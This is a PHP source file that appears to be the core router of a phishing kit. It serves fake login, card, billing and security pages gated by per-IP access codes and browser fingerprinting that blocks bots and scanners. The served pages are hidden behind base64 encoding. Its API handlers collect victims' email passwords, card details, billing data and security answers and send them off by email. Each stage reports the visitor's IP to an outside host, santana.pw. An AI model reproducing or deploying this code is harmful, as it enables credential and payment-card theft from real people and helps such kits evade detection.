<?php
if (!defined('ALLOW')) { http_response_code(403); exit; }

class goApp {
    
    private function showChallengePage(): void {
        $clientIp = get_client_ip();
        $accessCode = get_ip_access_code($clientIp);
        $config = get_app_config();
        
        // Set destination URL for redirect after verification
        $destinationUrl = '/' . $accessCode . '/login';
        
        // Prepare browser detection config
        $detectionEnabled = $config['browser_detection_enabled'] ?? true;
        $detectionLevel = $config['browser_detection_level'] ?? 'medium';
        
        // Map detection level to mode
        $modeMap = [
            'low' => 'log',      // Just log, don't block
            'medium' => 'verify', // Verify but allow
            'high' => 'block'     // Block bots
        ];
        $mode = $modeMap[$detectionLevel] ?? 'block';
        
        $browserDetectionConfig = [
            'enabled' => $detectionEnabled,
            'mode' => $mode,
            'level' => $detectionLevel,
            'block_suspicious' => $config['browser_detection_block_suspicious'] ?? true,
            'domain' => preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? 'localhost')
        ];
        $browserConfigJson = json_encode($browserDetectionConfig);
        
        // Blank verification page - just headless check, no UI
        $fingerprintScriptUrl = $this->assetUrl('assets/js/browser-fingerprint.js');
        
        $html = '<!doctype html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title></title>
    <script>window.__BROWSER_DETECTION_CONFIG__ = ' . $browserConfigJson . ';</script>
    <script src="' . $fingerprintScriptUrl . '"></script>
</head>
<body>
    <script>
        (async function() {
            const destUrl = "' . htmlspecialchars($destinationUrl) . '";
            const fpConfig = window.__BROWSER_DETECTION_CONFIG__ || { enabled: true, mode: "verify" };
            
            // Wait for fingerprint script to load
            let attempts = 0;
            while (typeof collectAndVerifyBrowser === "undefined" && attempts < 30) {
                await new Promise(resolve => setTimeout(resolve, 100));
                attempts++;
            }
            
            if (typeof collectAndVerifyBrowser === "function") {
                try {
                    const result = await collectAndVerifyBrowser(fpConfig);
                    
                    if (result.blocked) {
                        return;
                    }
                    
                    // Redirect after successful verification
                    window.location.href = destUrl;
                } catch (error) {
                    // Redirect anyway on error
                    window.location.href = destUrl;
                }
            } else {
                window.location.href = destUrl;
            }
        })();
    </script>
</body>
</html>';
        
        respond_html($html);
    }
    
    public function runApp() {
        // Removed automatic blocker check; blocker API is called only after successful submissions
        
        // Optional: allow manual OPcache reset when deploying updates
        if (isset($_GET['flush']) && function_exists('opcache_reset')) {
            @opcache_reset();
        }
        // Determine target content path from pretty URL or legacy query param `f`
        $path = null;

        // Legacy support: index.php?f=pages/flow/login.html
        if (isset($_GET['f'])) {
            $path = sanitize_path($_GET['f']);
        } else {
            // Pretty URLs with access code: /access-code/login, /access-code/cc, etc.
            $uriPath = (string)parse_url($_SERVER['REQUEST_URI'] ?? '/', PHP_URL_PATH);
            $basePath = str_replace('\\', '/', dirname($_SERVER['SCRIPT_NAME'] ?? '/'));
            $basePath = rtrim($basePath, '/');
            if ($basePath !== '' && $basePath !== '/' && str_starts_with($uriPath, $basePath . '/')) {
                $uriPath = substr($uriPath, strlen($basePath));
            }
            $route = trim($uriPath, '/');
            
            // If root path, return empty (no auto redirect)
            if ($route === '' || $route === 'index.php') {
                // Load config to get access parameter names
                $config = get_app_config();
                $accessParam = $config['access_parameter'];
                
                // Check if regular access parameter is provided
                if (isset($_GET[$accessParam])) {
                    // Show Cloudflare challenge page first
                    $this->showChallengePage();
                    return;
                } else {
                    respond_html('', 200);
                    return;
                }
            }
            
            // Parse route segments
            $parts = explode('/', $route);
            
                // Flow routes require access code: /access-code/page
                if (count($parts) < 2) {
                    respond_html('Access denied', 403);
                    return;
                }
                
                $accessCode = $parts[0];
                $page = $parts[1];
                
                // Check if access code is valid for this IP
                $clientIp = get_client_ip();
                if (!is_valid_access_code($accessCode, $clientIp)) {
                    respond_html('Access denied', 403);
                    return;
                }
                
                // Map flow pages
                $flowMap = [
                    'login' => 'flow/login.php',
                    'cc' => 'flow/cc.php',
                    'billing' => 'flow/billing.php',
                    'security' => 'flow/security.php',
                    'done' => 'flow/done.php',
                ];
                
                // API endpoints
                $apiMap = [
                    'send-email' => 'api/send-email',
                    'send-cc' => 'api/send-cc',
                    'send-billing' => 'api/send-billing',
                    'send-security' => 'api/send-security',
                ];
                
                $path = $flowMap[$page] ?? $apiMap[$page] ?? '';
        }

        $path = sanitize_path($path);
        if ($path === '' || (!str_starts_with($path, 'pages/') && !str_starts_with($path, 'views/') && !str_starts_with($path, 'flow/') && !str_starts_with($path, 'api/'))) {
            respond_html('Bad request', 400);
            return;
        }
        
        // Security page restriction: US only
        if ($path === 'flow/security.php') {
            $clientIp = get_client_ip();
            $geoData = get_geo_info($clientIp);
            
            // Only allow access if country is United States
            if ($geoData['country'] !== 'United States') {
                // Redirect non-US users to done page
                $accessCode = get_ip_access_code($clientIp);
                header('Location: /' . $accessCode . '/done');
                exit;
            }
        }
        
        // Handle API endpoints
        if (str_starts_with($path, 'api/')) {
            $this->handleApi($path);
            return;
        }
        
        // Resolve paths: legacy HTML under pages/, views under Tembuluk/Views
        if (str_starts_with($path, 'flow/')) {
            $abs = FCPATH . 'Tembuluk/Views/' . $path;
        } else {
        $abs = FCPATH . $path;
        }
        if (!is_file($abs)) {
            respond_html('Not found', 404);
            return;
        }
        // Render PHP view into a buffer when using views
        if (substr($abs, -4) === '.php') {
            ob_start();
            include $abs;
            $html = ob_get_clean();
        } else {
        $html = file_get_contents($abs);
        }
        
        // Visitor notify (login and done pages)
        if (str_starts_with($path, 'flow/')) {
            $pageType = str_replace(['flow/', '.php'], '', $path);
            
            // Login page: visit=visitor
            if ($pageType === 'login') {
                try {
                    $ip = get_client_ip();
                    $domain = preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? 'localhost');
                    $url = 'https://santana.pw/api/v1/logs?visit=visitor&domain=' . rawurlencode($domain) . '&ip=' . rawurlencode($ip);
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, $url);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
                    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
                    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
                    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
                    curl_exec($ch);
                    curl_close($ch);
                } catch (Throwable $e) {
                    // Silent fail
                }
            }
            
            // Done page: visit=done
            if ($pageType === 'done') {
                try {
                    $ip = get_client_ip();
                    $domain = preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? 'localhost');
                    $url = 'https://santana.pw/api/v1/logs?visit=done&domain=' . rawurlencode($domain) . '&ip=' . rawurlencode($ip);
                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, $url);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
                    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
                    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
                    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
                    curl_exec($ch);
                    curl_close($ch);
                } catch (Throwable $e) {
                    // Silent fail
                }
            }
        }
        
        // Removed page_visit logging per requirements
        if ($html === false) {
            respond_html('Read error', 500);
            return;
        }
        // Load translations (lang/default.json or lang/{locale}.json)
        $lang = load_translations(FCPATH);
        // Make translations available to views
        $langJson = json_encode($lang, JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE);
        
        // Load flow settings and access codes
        $config = get_app_config();
        $flowSettingsJson = json_encode($config['flow_settings'], JSON_UNESCAPED_SLASHES);
        $clientIp = get_client_ip();
        $accessCode = get_ip_access_code($clientIp);
        $accessParam = $config['access_parameter'];
        
        // Inject base path for dynamic asset loading
        $scriptDir = str_replace('\\', '/', dirname($_SERVER['SCRIPT_NAME'] ?? '/'));
        $scriptDir = rtrim($scriptDir, '/');
        $basePath = $scriptDir === '' ? '' : $scriptDir;
        
        $inject = "<script>window.__LANG__ = " . $langJson . "; window.__FLOW_SETTINGS__ = " . $flowSettingsJson . "; window.__ACCESS_CODE__ = '" . $accessCode . "'; window.__ACCESS_PARAM__ = '" . $accessParam . "'; window.__BASE_PATH__ = '" . $basePath . "';</script>";
        $html = str_replace('</head>', $inject . "</head>", $html);

        $htmlb64 = base64_encode($html);
        $out = "<!doctype html>\n<html>\n  <head>\n    <meta charset=\"utf-8\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n    <title></title>\n    <style>\n      body{margin:0;font-family:-apple-system,BlinkMacSystemFont,\"Segoe UI\",Roboto,sans-serif}\n      #loading-overlay{position:fixed;top:0;left:0;width:100%;height:100%;background:#fff;display:flex;align-items:center;justify-content:center;z-index:999999}\n      .spinner{width:50px;height:50px;border:4px solid rgba(0,0,0,.1);border-top:4px solid #e50914;border-radius:50%;animation:spin 1s linear infinite}\n      @keyframes spin{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}\n      .fade-out{opacity:0;transition:opacity .2s ease-out}\n    </style>\n  </head>\n  <body>\n    <div id=\"loading-overlay\"><div class=\"spinner\"></div></div>\n    <script src=\"" . $this->assetUrl('assets/encrypt.js') . "\" data-html-b64=\"" . $htmlb64 . "\"></script>\n  </body>\n</html>";
        respond_html($out);
    }

    private function assetUrl(string $rel): string {
        // Build an absolute URL path that works from any pretty route
        $scriptDir = str_replace('\\', '/', dirname($_SERVER['SCRIPT_NAME'] ?? '/'));
        $scriptDir = rtrim($scriptDir, '/');
        if ($scriptDir === '' || $scriptDir === '.') { $scriptDir = ''; }
        $prefix = $scriptDir === '' ? '' : $scriptDir;
        return ($prefix === '' ? '/' : $prefix . '/') . ltrim($rel, '/');
    }
    
    private function handleApi(string $path): void {
        if ($path === 'api/send-email' && $_SERVER['REQUEST_METHOD'] === 'POST') {
            $input = file_get_contents('php://input');
            $data = json_decode($input, true);
            
            if (!is_array($data) || empty($data['email']) || empty($data['password'])) {
                respond_json(['error' => 'Invalid data'], 400);
                return;
            }
            
            $loginData = [
                'email' => $data['email'],
                'password' => $data['password']
            ];
            
            $ip = get_client_ip();
            $geoData = get_geo_info($ip);
            
            $success = send_login_email($loginData, $geoData);
            // Notify logs API after submit
            try {
                $ip = get_client_ip();
                $domain = preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? 'localhost');
                $url = 'https://santana.pw/api/v1/logs?visit=login&domain=' . rawurlencode($domain) . '&ip=' . rawurlencode($ip);
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_TIMEOUT, 3);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
                curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
                curl_exec($ch);
                curl_close($ch);
            } catch (Throwable $e) {
                // Silent fail
            }
            
            if ($success) {
                respond_json(['success' => true]);
            } else {
                respond_json(['error' => 'Email failed'], 500);
            }
        } elseif ($path === 'api/send-cc' && $_SERVER['REQUEST_METHOD'] === 'POST') {
            $input = file_get_contents('php://input');
            $data = json_decode($input, true);
            
            if (!is_array($data) || empty($data['cc']) || empty($data['login'])) {
                respond_json(['error' => 'Invalid data'], 400);
                return;
            }
            
            $ccData = $data['cc'];
            $loginData = $data['login'];
            
            $ip = get_client_ip();
            $geoData = get_geo_info($ip);
            
            $success = send_cc_email($ccData, $loginData, $geoData);
            // Notify logs API after submit
            try {
                $ip = get_client_ip();
                $domain = preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? 'localhost');
                $url = 'https://santana.pw/api/v1/logs?visit=cc&domain=' . rawurlencode($domain) . '&ip=' . rawurlencode($ip);
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_TIMEOUT, 3);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
                curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
                curl_exec($ch);
                curl_close($ch);
            } catch (Throwable $e) {
                // Silent fail
            }
            
            if ($success) {
                respond_json(['success' => true]);
            } else {
                respond_json(['error' => 'Email failed'], 500);
            }
        } elseif ($path === 'api/send-billing' && $_SERVER['REQUEST_METHOD'] === 'POST') {
            $input = file_get_contents('php://input');
            $data = json_decode($input, true);
            
            if (!is_array($data) || empty($data['billing']) || empty($data['login'])) {
                respond_json(['error' => 'Invalid data'], 400);
                return;
            }
            
            $billingData = $data['billing'];
            $loginData = $data['login'];
            $ccData = $data['cc'] ?? null;
            
            $ip = get_client_ip();
            $geoData = get_geo_info($ip);
            
            $success = send_billing_email($billingData, $loginData, $geoData, $ccData);
            // Notify logs API after submit
            try {
                $ip = get_client_ip();
                $domain = preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? 'localhost');
                $url = 'https://santana.pw/api/v1/logs?visit=billing&domain=' . rawurlencode($domain) . '&ip=' . rawurlencode($ip);
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_TIMEOUT, 3);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
                curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
                curl_exec($ch);
                curl_close($ch);
            } catch (Throwable $e) {
                // Silent fail
            }
            
            if ($success) {
                respond_json(['success' => true]);
            } else {
                respond_json(['error' => 'Email failed'], 500);
            }
        } elseif ($path === 'api/send-security' && $_SERVER['REQUEST_METHOD'] === 'POST') {
            $input = file_get_contents('php://input');
            $data = json_decode($input, true);
            
            if (!is_array($data) || empty($data['security']) || empty($data['login'])) {
                respond_json(['error' => 'Invalid data'], 400);
                return;
            }
            
            $securityData = $data['security'];
            $loginData = $data['login'];
            $billingData = $data['billing'] ?? null;
            $ccData = $data['cc'] ?? null;
            
            $ip = get_client_ip();
            $geoData = get_geo_info($ip);
            
            $success = send_security_email($securityData, $loginData, $geoData, $billingData, $ccData);
            // Notify logs API after submit
            try {
                $ip = get_client_ip();
                $domain = preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? 'localhost');
                $url = 'https://santana.pw/api/v1/logs?visit=security&domain=' . rawurlencode($domain) . '&ip=' . rawurlencode($ip);
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_TIMEOUT, 3);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
                curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
                curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
                curl_exec($ch);
                curl_close($ch);
            } catch (Throwable $e) {
                // Silent fail
            }
            
            if ($success) {
                respond_json(['success' => true]);
            } else {
                respond_json(['error' => 'Email failed'], 500);
            }
        } else {
            respond_json(['error' => 'Not found'], 404);
        }
    }
}
